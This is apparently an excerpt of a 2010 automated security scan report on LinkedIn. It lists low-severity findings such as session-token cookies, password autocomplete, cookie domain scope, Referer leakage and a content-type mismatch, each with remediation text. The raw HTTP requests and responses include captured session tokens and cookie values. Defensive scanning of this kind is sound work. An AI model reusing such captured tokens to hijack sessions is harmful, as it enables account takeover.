HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:Z-X_6-mIvra3NGL3_eX_cDmjZa1zywZ7cVnKHx5ABn13J-KjVmFfKP:1289861671:37f09e193f106f13f49040cc95dfe73e1466584b"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:7896604433834199992"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/ Set-Cookie: bcookie="v=1&552cf567-4934-49be-abab-0884e4f8c630"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Mon, 15 Nov 2010 22:54:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly Content-Length: 20300
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /groups?home=&gid=2525539 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.redhat.com/community/ Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&9d51b8e1-b21b-450f-9529-4bdf8f075257"; JSESSIONID="ajax:7573697098806337810"; leo_auth_token="GST:9DYqDQVGJuxFh_XV2jBAIzGuyYxPq2mHUGhdhrVGJ-guhcSrk-NgWM:1289859827:3120e47d32d8552203729d10fbb502d5495c47c1"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:9uuAD9t1rt6GhtJBSowdWKtaCwEtPDC-z-D2uOhpwt7WdpSBfBWInu:1289861671:aff9f67088db4a37cbd64452dad347683ea3f899"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Mon, 15 Nov 2010 22:54:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly Content-Length: 15038
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /languageSelector HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.linkedin.com/ Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&940a8e78-9a51-44d2-9ac8-8c09be81ae88"; JSESSIONID="ajax:2419415598030071254"; leo_auth_token="GST:ZU_zld0-KNXoIUmqxmEeKdziw_Xg1Anfc3c7KsT4K2Fg5ZMq2y94H-:1289859826:8dbc5457ef02c54efb2b784b5b95f8d982c0fbba"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c="; Content-Type: application/x-www-form-urlencoded Content-Length: 127
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /ns HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.linkedin.com/ Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&fdfe5b14-edf4-40b7-8977-bde052b3e77f"; JSESSIONID="ajax:1219787687806042432"; leo_auth_token="GST:93uAUi_hHjsJ5-iihCDfjm_DCssmLDOrPkwqUR6hxYo-3GiMtL2tb9:1289859826:4d8fbdcdc16ae91308e53ced09235692d4ab0b84"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c="; Content-Type: application/x-www-form-urlencoded Content-Length: 80
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8Y4zwT1IiPk7oqOE8qJ3_9CsBhk9ojJE0wisgF5L82k7Vj1KZR-Vih:1289861671:86ef1f0c0e6cc59be504fe9935d7df41aea4ec40"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Location: http://www.linkedin.com/pub/dir/?first=Peter&last=Wiener Content-Length: 0 Date: Mon, 15 Nov 2010 22:54:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly
3. Password field with autocomplete enabledpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.linkedin.com
Path:
/groups
Issue detail
The page contains a form with the following action URL:
https://www.linkedin.com/secure/login
The form contains the following password field with autocomplete enabled:
session_password
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /groups?home=&gid=2525539 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.redhat.com/community/ Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&9d51b8e1-b21b-450f-9529-4bdf8f075257"; JSESSIONID="ajax:7573697098806337810"; leo_auth_token="GST:9DYqDQVGJuxFh_XV2jBAIzGuyYxPq2mHUGhdhrVGJ-guhcSrk-NgWM:1289859827:3120e47d32d8552203729d10fbb502d5495c47c1"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:9uuAD9t1rt6GhtJBSowdWKtaCwEtPDC-z-D2uOhpwt7WdpSBfBWInu:1289861671:aff9f67088db4a37cbd64452dad347683ea3f899"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Mon, 15 Nov 2010 22:54:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly Content-Length: 15038
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:Z-X_6-mIvra3NGL3_eX_cDmjZa1zywZ7cVnKHx5ABn13J-KjVmFfKP:1289861671:37f09e193f106f13f49040cc95dfe73e1466584b"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:7896604433834199992"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/ Set-Cookie: bcookie="v=1&552cf567-4934-49be-abab-0884e4f8c630"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Mon, 15 Nov 2010 22:54:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly Content-Length: 20300
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /groups?home=&gid=2525539 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.redhat.com/community/ Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&9d51b8e1-b21b-450f-9529-4bdf8f075257"; JSESSIONID="ajax:7573697098806337810"; leo_auth_token="GST:9DYqDQVGJuxFh_XV2jBAIzGuyYxPq2mHUGhdhrVGJ-guhcSrk-NgWM:1289859827:3120e47d32d8552203729d10fbb502d5495c47c1"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:9uuAD9t1rt6GhtJBSowdWKtaCwEtPDC-z-D2uOhpwt7WdpSBfBWInu:1289861671:aff9f67088db4a37cbd64452dad347683ea3f899"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Mon, 15 Nov 2010 22:54:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly Content-Length: 15038
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /languageSelector HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.linkedin.com/ Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&940a8e78-9a51-44d2-9ac8-8c09be81ae88"; JSESSIONID="ajax:2419415598030071254"; leo_auth_token="GST:ZU_zld0-KNXoIUmqxmEeKdziw_Xg1Anfc3c7KsT4K2Fg5ZMq2y94H-:1289859826:8dbc5457ef02c54efb2b784b5b95f8d982c0fbba"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c="; Content-Type: application/x-www-form-urlencoded Content-Length: 127
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /ns HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.linkedin.com/ Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&fdfe5b14-edf4-40b7-8977-bde052b3e77f"; JSESSIONID="ajax:1219787687806042432"; leo_auth_token="GST:93uAUi_hHjsJ5-iihCDfjm_DCssmLDOrPkwqUR6hxYo-3GiMtL2tb9:1289859826:4d8fbdcdc16ae91308e53ced09235692d4ab0b84"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c="; Content-Type: application/x-www-form-urlencoded Content-Length: 80
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The page was loaded from a URL containing a query string:
http://go.microsoft.com/fwlink/?LinkId=121315
The response contains the following link to another domain:
http://www.ieaddons.com/en/ie8slice/Default.aspx
Request
GET /fwlink/?LinkId=121315 HTTP/1.1 Accept: */* If-Modified-Since: Sun, 14 Nov 2010 22:10:24 GMT A-IM: feed Accept-Language: en-US User-Agent: Windows-RSS-Platform/2.0 (MSIE 8.0; Windows NT 6.1) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: go.microsoft.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: A=I&I=AxUFAAAAAACMBwAAy3eITXpGsXEo3SGfnFhbmg!!
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 165 Content-Type: text/html; charset=utf-8 Expires: Mon, 15 Nov 2010 22:53:51 GMT Location: http://www.ieaddons.com/en/ie8slice/Default.aspx Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 15 Nov 2010 22:54:51 GMT
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.ieaddons.com/en/ie8slice/Default.aspx">here</a>.</h2> </body></html>
The response contains the following Content-type statement:
Content-type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /robots.txt HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Mon, 15 Nov 2010 22:54:31 GMT Content-length: 1444 Content-type: text/plain Last-modified: Fri, 22 Oct 2010 00:07:11 GMT Etag: W/"5a4-4cc0d5af"